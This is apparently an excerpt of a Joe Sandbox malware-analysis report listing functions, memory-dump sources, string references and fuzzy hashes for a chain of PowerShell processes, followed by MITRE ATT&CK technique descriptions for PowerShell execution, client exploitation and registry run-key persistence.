Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
Instruction Fuzzy Hash: 04D01771205602AFD224EB14DD80F2BF76AFFC4712F14C264E9044B6A9C730E892CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3160, Parent PID: 3076COMMON

Executed Functions

Function 001FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.519157846.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43b4c4bef58ad516b7e0c0262d3a204e28df0bc4caaabbd619ff9455d78962e
Instruction ID: e3349bb4c8055febc06a07737feec9131a8d3fb7f4183b0f6d495f4006c10a6d
Opcode Fuzzy Hash: b43b4c4bef58ad516b7e0c0262d3a204e28df0bc4caaabbd619ff9455d78962e
Instruction Fuzzy Hash: 9B01F771404344AAE7218E15EC84B77BFD8EF41324F28841AFE484B286CB79D845C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.519157846.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7a988ef36b542eb2337f1291f9beb6e645e3fc4fd2ff5e960a40139f20f02d
Instruction ID: 3ab151e9f43c02417745f6bb0c3b142722146cd3b1454b930582d4c199807ce4
Opcode Fuzzy Hash: fa7a988ef36b542eb2337f1291f9beb6e645e3fc4fd2ff5e960a40139f20f02d
Instruction Fuzzy Hash: 1601296140D3C49FD7138B259C94B62BFB4EF43224F1981DBE9888F2A7C2699848C772

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3248, Parent PID: 3160COMMON

Executed Functions

Function 002554A0 Relevance: 16.9, Strings: 13, Instructions: 675COMMON

Download Yara Rule

Strings

*$, xrefs: 00255F42
*$, xrefs: 00255CC4
*$, xrefs: 00255B22
*$, xrefs: 00255FBF
*$, xrefs: 00255EBE
*$, xrefs: 00255894
*$, xrefs: 002556DC
*$, xrefs: 002559CF
*$, xrefs: 00255A93
*$, xrefs: 00255810
(, xrefs: 00255D58
*$, xrefs: 00255DA8
*$, xrefs: 00255930

Memory Dump Source

Source File: 00000008.00000002.441272764.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_powershell.jbxd

Similarity

API ID:
String ID: ($*$$*$$*$$*$$*$$*$$*$$*$$*$$*$$*$$*$
API String ID: 0-3641609719
Opcode ID: 2bf19a848b50d7179bb8faaaeca92631313c755deb201f692fa17eafc06ed549
Instruction ID: 8fd6efa195a3669c0a49e43fea1529565b688424c5ceb7f0e3a37813336d7131
Opcode Fuzzy Hash: 2bf19a848b50d7179bb8faaaeca92631313c755deb201f692fa17eafc06ed549
Instruction Fuzzy Hash: C362C174E10229DFDB68DF68C894BEDB7B2BB89305F1481EAD409A7295DB305E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003822A0 Relevance: 25.8, Strings: 20, Instructions: 833COMMON

Download Yara Rule

Strings

$p, xrefs: 003822F7
$p, xrefs: 00382350
4'p, xrefs: 00382AC7
4'p, xrefs: 00382732
4'p, xrefs: 003823BA
4'p, xrefs: 003823AE
$&#, xrefs: 00382C7A
$p, xrefs: 0038255B
4'p, xrefs: 00382900
4'p, xrefs: 00382AD3
$p, xrefs: 00382533
4'p, xrefs: 0038290C
4'p, xrefs: 0038273E
(op, xrefs: 00382C96
$p, xrefs: 0038254F
$&#, xrefs: 00382C6D
$p, xrefs: 0038235C
(op, xrefs: 00382CA6
4'p, xrefs: 0038257E
4'p, xrefs: 00382572

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $&#$$&#$(op$(op$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$$p$$p$$p$$p$$p$$p
API String ID: 0-3302390299
Opcode ID: d0a6d4c8824b1c30f60570149c0757cf7fe46d870d1921bf03649a787e9f985e
Instruction ID: 06bf05d52329031a16436558ffc9913873b2a59d4dfd7363920084e9933a7170
Opcode Fuzzy Hash: d0a6d4c8824b1c30f60570149c0757cf7fe46d870d1921bf03649a787e9f985e
Instruction Fuzzy Hash: C052E334B04304DFCB2AAF69C4546ABBBE2AFC5310F29C4EAD8558B251DB74CD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003816D0 Relevance: 20.5, Strings: 16, Instructions: 520COMMON

Download Yara Rule

Strings

4'p, xrefs: 00381A0F
$p, xrefs: 00381B77
$p, xrefs: 00381B95
$p, xrefs: 00381BA1
4'p, xrefs: 00381A03
g, xrefs: 00381960
$p, xrefs: 00381B83
tPp, xrefs: 0038177E
@=0, xrefs: 0038195B
@=0, xrefs: 003818DB
tPp, xrefs: 00381981
@=0, xrefs: 003819BA
$p, xrefs: 00381B3F
tPp, xrefs: 00381975
$p, xrefs: 00381B5B
tPp, xrefs: 0038178A

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$@=0$@=0$@=0$tPp$tPp$tPp$tPp$$p$$p$$p$$p$$p$$p$g
API String ID: 0-3641196495
Opcode ID: ec8867e09e68f11eeb5295aff4a1f4affbdd515143bc6720e8ca832de2f7cfbf
Instruction ID: d9bece5420fc72d09c45bd0f1f2aaf02408068e7a4c6399d050735d647e188a0
Opcode Fuzzy Hash: ec8867e09e68f11eeb5295aff4a1f4affbdd515143bc6720e8ca832de2f7cfbf
Instruction Fuzzy Hash: 46023931B043009FDB2AAB68D85077ABFEAAFC5310F2984AAD545CB395DB71CC46C791

Uniqueness

Uniqueness Score: -1.00%

Function 00380F20 Relevance: 14.0, Strings: 11, Instructions: 299COMMON

Download Yara Rule

Strings

h<0, xrefs: 0038124B
D<0, xrefs: 00380F9A
D<0, xrefs: 003810B7
D<0, xrefs: 00380FFF
$p, xrefs: 00381061
$p, xrefs: 00381019
4'p, xrefs: 00381103
4'p, xrefs: 003810F7
h<0, xrefs: 0038128F
D<0, xrefs: 0038103B
$p, xrefs: 00381055

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$D<0$D<0$D<0$D<0$h<0$h<0$$p$$p$$p
API String ID: 0-4011506972
Opcode ID: 7550fdc76b8e7b0de0bd7325509326e96c8b8d96602853b90edb5495fbb9eca7
Instruction ID: 4790ab8c58a024fb1f91cfcc8ef0d8f9e7b2452bd306ce261dc4cde7ebd0cc8e
Opcode Fuzzy Hash: 7550fdc76b8e7b0de0bd7325509326e96c8b8d96602853b90edb5495fbb9eca7
Instruction Fuzzy Hash: 6DA179747043049FDB2BAA78881077E7BEA9FC5300F2584AADA46CB291DE71CC87C761

Uniqueness

Uniqueness Score: -1.00%

Function 00384B80 Relevance: 13.2, Strings: 10, Instructions: 670COMMON

Download Yara Rule

Strings

4'p, xrefs: 00384D65
O8, xrefs: 00384FC4
tC$, xrefs: 0038531E
4'p, xrefs: 00384F15
0Up, xrefs: 00384B9B
4'p, xrefs: 00384F09
B$, xrefs: 00384D20
,C$, xrefs: 00385080
4'p, xrefs: 00384D59
PC$, xrefs: 00385206

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: ,C$$0Up$4'p$4'p$4'p$4'p$O8$PC$$tC$$B$
API String ID: 0-1296086215
Opcode ID: 3c41d362bef128e8a6fd38fe8e7d6010ce94f5bf948a79bdb7d27346e745d0b8
Instruction ID: d2930c36068adf5c53f76e9bdc325169e7c4adb53878a915d49dc39c0a4241cc
Opcode Fuzzy Hash: 3c41d362bef128e8a6fd38fe8e7d6010ce94f5bf948a79bdb7d27346e745d0b8
Instruction Fuzzy Hash: E4224635B043019FCB26EB689444A6AFFF6AFC9310B2AC4EAD505CB756DA31CC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00380F02 Relevance: 8.9, Strings: 7, Instructions: 130COMMON

Download Yara Rule

Strings

D<0, xrefs: 00380F9A
D<0, xrefs: 003810B7
$p, xrefs: 00381019
D<0, xrefs: 00380FFF
4'p, xrefs: 003810F7
D<0, xrefs: 0038103B
$p, xrefs: 00381055

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$D<0$D<0$D<0$D<0$$p$$p
API String ID: 0-125779409
Opcode ID: c3f131f588910f86e6e17486a27b987f007353249713c12cb34001898265a853
Instruction ID: a26cb07ba641b26cb95d8b5d1a80027c5603c6c575d1e7990e9a035dc7a8d29d
Opcode Fuzzy Hash: c3f131f588910f86e6e17486a27b987f007353249713c12cb34001898265a853
Instruction Fuzzy Hash: AD4149B4300304AFDF2B6A25981037A7B7E4F45340F1680E6DA01EB592DB75CC8BC761

Uniqueness

Uniqueness Score: -1.00%

Function 0038106F Relevance: 5.0, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

$p, xrefs: 00381090
D<0, xrefs: 00381078
D<0, xrefs: 003810B7
4'p, xrefs: 003810F7

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$D<0$D<0$$p
API String ID: 0-848727350
Opcode ID: aa8ec93d965423f1b8482024ec4204b9837aba27a47a06aaa3a7844ea8f6894e
Instruction ID: 5909f6326624e373441126ce0ad9c9b0df8f78a16ba25831a0efe5ec5689d43f
Opcode Fuzzy Hash: aa8ec93d965423f1b8482024ec4204b9837aba27a47a06aaa3a7844ea8f6894e
Instruction Fuzzy Hash: 96014974700300EBDF2BB7A5A82067EB76A9B8C740F2180AADE01AA655CB32CC07D755

Uniqueness

Uniqueness Score: -1.00%

Function 00382BA4 Relevance: 3.8, Strings: 3, Instructions: 83COMMON

Download Yara Rule

Strings

(op, xrefs: 00382C96
$&#, xrefs: 00382C6D
$&#, xrefs: 00382C7A

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $&#$$&#$(op
API String ID: 0-96067973
Opcode ID: e85351df5924a5c66e75aa38eaee6e965005cf4b6b248af5b989e41793366f91
Instruction ID: bd0e8a095178387bce1904939106d9277367b418881fa5836d8448000d1b3362
Opcode Fuzzy Hash: e85351df5924a5c66e75aa38eaee6e965005cf4b6b248af5b989e41793366f91
Instruction Fuzzy Hash: E3318030A00709DFDB2AEF29C845BABBBF5FB94311F1680A6E8258B191C770D994CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00382BB0 Relevance: 3.8, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

(op, xrefs: 00382C96
$&#, xrefs: 00382C6D
$&#, xrefs: 00382C7A

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $&#$$&#$(op
API String ID: 0-96067973
Opcode ID: 2a94707e80d02bd0a64e10f5394fbd496b14bde748eb0ad7e1423b2cd12dd6b3
Instruction ID: a538d6464890ce17b8405b0db8527aa42f76d527598b29e999f9207d208e9320
Opcode Fuzzy Hash: 2a94707e80d02bd0a64e10f5394fbd496b14bde748eb0ad7e1423b2cd12dd6b3
Instruction Fuzzy Hash: 83318030A00709DFDB2AEF29C845BABBBF5FF94311F1684A5E8258B291C770D894CB51

Uniqueness

Uniqueness Score: -1.00%

Function 002577CA Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.441272764.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27fdd7509f580302e8da8425e62822783c05e6304985f379b68cf41eea173874
Instruction ID: 9bde29b7f0c8563a5e7f3390e2ceb47e27cd4e93ee4fb3e7458d2d44ad2a2349
Opcode Fuzzy Hash: 27fdd7509f580302e8da8425e62822783c05e6304985f379b68cf41eea173874
Instruction Fuzzy Hash: 9FD14934904298CFDB54DFACD588B8DFBF2AF45346F1980A9C808AB252C7309D85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0019D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.441221323.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c19c68866056fdd486d4e052ca697c8d21f35a10551a28be744419da9ac024
Instruction ID: 74fd75562f16db24d0acf8816c9df6f23285de27b248b7107d01e101489acb1e
Opcode Fuzzy Hash: 82c19c68866056fdd486d4e052ca697c8d21f35a10551a28be744419da9ac024
Instruction Fuzzy Hash: 2A01A271504344AAEB204E29EC84B67BFD8EF41724F2C851AFD494B286C779D845CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0019D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.441221323.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0f27c98c31a8bf2ddac1d07779b67755f47ce3a4482c77605c229452706f01
Instruction ID: 720504a0987855093ba0a05cb8d313e141b9f8db00bf68c3dfa58d6f491232e7
Opcode Fuzzy Hash: 5f0f27c98c31a8bf2ddac1d07779b67755f47ce3a4482c77605c229452706f01
Instruction Fuzzy Hash: B2F06271404344AFEB108E16DCC8B66FFD8EB41728F18C55AED484E286C3799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00382DF8 Relevance: 27.2, Strings: 21, Instructions: 977COMMON

Download Yara Rule

Strings

tPp, xrefs: 00383388
$p, xrefs: 00382FDA
tPp, xrefs: 0038337C
4'p, xrefs: 003834D6
tPp, xrefs: 00383900
4'p, xrefs: 00383218
tPp, xrefs: 0038362B
$p, xrefs: 0038300C
$p, xrefs: 00383000
4'p, xrefs: 003834E0
tPp, xrefs: 003838F4
tPp, xrefs: 00383637
4'p, xrefs: 0038378E
tPp, xrefs: 00383045
$p, xrefs: 00383864
4'p, xrefs: 0038320E
tPp, xrefs: 00383051
4'p, xrefs: 00383782
4'p, xrefs: 00382EFB
4'p, xrefs: 00382F07
28, xrefs: 003832C4

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 28$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$tPp$tPp$tPp$tPp$tPp$tPp$tPp$tPp$$p$$p$$p$$p
API String ID: 0-917255616
Opcode ID: 98353910ae80ad208386ea2e780109c6db25a6cf94510ba0f80d3a28eec6547c
Instruction ID: d5f0c8473f5db67a7df5bd884dc33bf915f00ec36f3274b9e9147716683ab288
Opcode Fuzzy Hash: 98353910ae80ad208386ea2e780109c6db25a6cf94510ba0f80d3a28eec6547c
Instruction Fuzzy Hash: C6627875B043409FCB26AB6C881076ABFB69FC6710F2984EBD545CB381DA71CE45C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 003800A0 Relevance: 16.7, Strings: 13, Instructions: 401COMMON

Download Yara Rule

Strings

'%, xrefs: 00380563
L4p, xrefs: 0038040E
L4p, xrefs: 003801BE
L:0, xrefs: 003803D9
L4p, xrefs: 003801C9
L:0, xrefs: 00380490
L:0, xrefs: 0038036B
L4p, xrefs: 00380160
(:0, xrefs: 00380240
L4p, xrefs: 00380419
(:0, xrefs: 00380189
(:0, xrefs: 0038011B
L4p, xrefs: 003803B0

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: '%$(:0$(:0$(:0$L4p$L4p$L4p$L4p$L4p$L4p$L:0$L:0$L:0
API String ID: 0-3952867134
Opcode ID: f997b43c591f9e867c3a52d13c201452418178c88276cc9ca077c1eaf9568872
Instruction ID: 85130eb5a0c3bc8b06c90912d00597a81a082ad2306b3bc824d4ab2903d0912c
Opcode Fuzzy Hash: f997b43c591f9e867c3a52d13c201452418178c88276cc9ca077c1eaf9568872
Instruction Fuzzy Hash: FBD18934700344EFCF5AAF68D4547AE7BB6AF85310F1984BAE9518B291CBB0CC49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00383A00 Relevance: 9.2, Strings: 7, Instructions: 476COMMON

Download Yara Rule

Strings

4'p, xrefs: 00383C71
$p, xrefs: 00383A44
$p, xrefs: 00383A38
tPp, xrefs: 00383A7D
4'p, xrefs: 00383C67
$p, xrefs: 00383A12
tPp, xrefs: 00383A89

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$tPp$tPp$$p$$p$$p
API String ID: 0-1066480243
Opcode ID: 48e873870fb05dd8682f2432ebd52c86aa03ef1ffd609cec4df16a34e0fb33f7
Instruction ID: 6f2fcea0e507a6bc47b98415f657d920cd447f47b0a7df3d8749d87e6cc0bd49
Opcode Fuzzy Hash: 48e873870fb05dd8682f2432ebd52c86aa03ef1ffd609cec4df16a34e0fb33f7
Instruction Fuzzy Hash: 59F14575B043409FCB26AB6C941066ABFF6AFC5B10F2584BAD945CB341DB31CE46C792

Uniqueness

Uniqueness Score: -1.00%

Function 0038619A Relevance: 8.9, Strings: 7, Instructions: 166COMMON

Download Yara Rule

Strings

L4p, xrefs: 00386240
L4p, xrefs: 0038629E
L4p, xrefs: 003862A9
HE$, xrefs: 003861FB
HE$, xrefs: 00386269
HJ#, xrefs: 0038630D
HE$, xrefs: 00386320

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: HE$$HE$$HE$$HJ#$L4p$L4p$L4p
API String ID: 0-3640510038
Opcode ID: 69e482b01f8e6022f238b1b8a2406ef771d750d2a819400fac75af98002fcb2a
Instruction ID: eb53ac365cfb8f401dd681220d92da12b61fdfb950e47823ccb541fda9d250e0
Opcode Fuzzy Hash: 69e482b01f8e6022f238b1b8a2406ef771d750d2a819400fac75af98002fcb2a
Instruction Fuzzy Hash: ED517939B00304EBCF26AF68D412BBE7BA6AF85310F1984F5E9118B291CBB1CD41C751

Uniqueness

Uniqueness Score: -1.00%

Function 003807C0 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

L4p, xrefs: 003808E9
L4p, xrefs: 003808DE
L4p, xrefs: 00380880
$;0, xrefs: 00380A18

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $;0$L4p$L4p$L4p
API String ID: 0-3943822584
Opcode ID: 70fa926284a1953a2b1931fd843ae12d9557d120abf223c218d145a48cf06533
Instruction ID: e454147dad21459c7c8a1960859996fa64182dc3786548fc8dcece32ae67a00a
Opcode Fuzzy Hash: 70fa926284a1953a2b1931fd843ae12d9557d120abf223c218d145a48cf06533
Instruction Fuzzy Hash: 7E615835700304EFDF5AAF68D45076EBFB6AF85300F1580AAE9519B2A2DB70DC89C791

Uniqueness

Uniqueness Score: -1.00%

Function 00385A40 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$p, xrefs: 00385A6E
$p, xrefs: 00385A52
$p, xrefs: 00385AA8
$p, xrefs: 00385A9C

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 01db0fe63ccf046996591ad88f6cb521f90d4a0892d6f1aa551e0f9dad252d2b
Instruction ID: 1bd5996495e2633ddb6772756962b236fdf406300075e3c701ec0b0e87ecd088
Opcode Fuzzy Hash: 01db0fe63ccf046996591ad88f6cb521f90d4a0892d6f1aa551e0f9dad252d2b
Instruction Fuzzy Hash: A82132357007019BDB2B6A7998C0B3BABDA9FD4310F78846AE945CB281DEB5CC41C361

Uniqueness

Uniqueness Score: -1.00%

Function 00381ADC Relevance: 5.1, Strings: 4, Instructions: 73COMMON

Download Yara Rule

Strings

$p, xrefs: 00381B77
$p, xrefs: 00381B95
$p, xrefs: 00381B3F
$p, xrefs: 00381B5B

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: b7f825b2c0e94d26e0c977d3357292c907e655137a537b44c59a69aca28b2f9a
Instruction ID: fd8e9b69386243251110c073ef9c201fccde2ca30f14ecd36c2ef324865221ae
Opcode Fuzzy Hash: b7f825b2c0e94d26e0c977d3357292c907e655137a537b44c59a69aca28b2f9a
Instruction Fuzzy Hash: BD21CF32A003019FDF33AE24894177AFBFDAB90750F2A44AAD85487651E7B1C943C791

Uniqueness

Uniqueness Score: -1.00%

Function 00381AE8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

$p, xrefs: 00381B77
$p, xrefs: 00381B95
$p, xrefs: 00381B3F
$p, xrefs: 00381B5B

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 299c3239d956d002ecd38de460823582fe0e2c3986e51c40263b436cc14f2c1a
Instruction ID: ebf23eace1bac5bec148b2b3354b56933be0d56344836678290a9090a74cd08f
Opcode Fuzzy Hash: 299c3239d956d002ecd38de460823582fe0e2c3986e51c40263b436cc14f2c1a
Instruction Fuzzy Hash: 2821A131A003059FDB33AE14894177AFBFDAB90750F2A44AAD85487641E7B1D942C791

Uniqueness

Uniqueness Score: -1.00%

Function 0038071A Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

4'p, xrefs: 0038078F
$p, xrefs: 00380762
$p, xrefs: 0038076E
4'p, xrefs: 00380783

Memory Dump Source

Source File: 00000008.00000002.441326554.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_380000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$$p$$p
API String ID: 0-377911355
Opcode ID: 5617af3374f07a2f1a4bf0659675d4bb5c54855885dc927141c778815919adae
Instruction ID: 237348551125954d68ad54b4dccdf869709a63d7e83e15b7e66e06db86dd1c38
Opcode Fuzzy Hash: 5617af3374f07a2f1a4bf0659675d4bb5c54855885dc927141c778815919adae
Instruction Fuzzy Hash: AF01A22070D3C01FD76F23781821269AF620FC2260B6E42EBD1D1CF6D7D9598C4AC792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3476, Parent PID: 3248COMMON

Executed Functions

Function 0021D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.435515437.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_21d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5265ad67d8aeacfebdf98180e9026f49f21d77d564610b54ed13336889da94f
Instruction ID: d7104ee0eacda74185c5efa546775f5ef592fe04c80ba1a4ad3f0860514d9135
Opcode Fuzzy Hash: e5265ad67d8aeacfebdf98180e9026f49f21d77d564610b54ed13336889da94f
Instruction Fuzzy Hash: 8A01A771514340EEE7104E19C8C4BA7BFD8DF59724F18841AED454B286C6B9DC95C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0021D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.435515437.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_21d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a19009e0690b8cb14407c56e34fab06941dd4aa73fb50e02ca71e7a9b04d235c
Instruction ID: 633157b773bd8ee2ce227a03cc211774d1ec68946435e283246bcfccd7de512a
Opcode Fuzzy Hash: a19009e0690b8cb14407c56e34fab06941dd4aa73fb50e02ca71e7a9b04d235c
Instruction Fuzzy Hash: 12F06271404344AEE7108E1ACCC4BA6FFD8EB55728F28C55AED494E286C2799C84CAB1

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

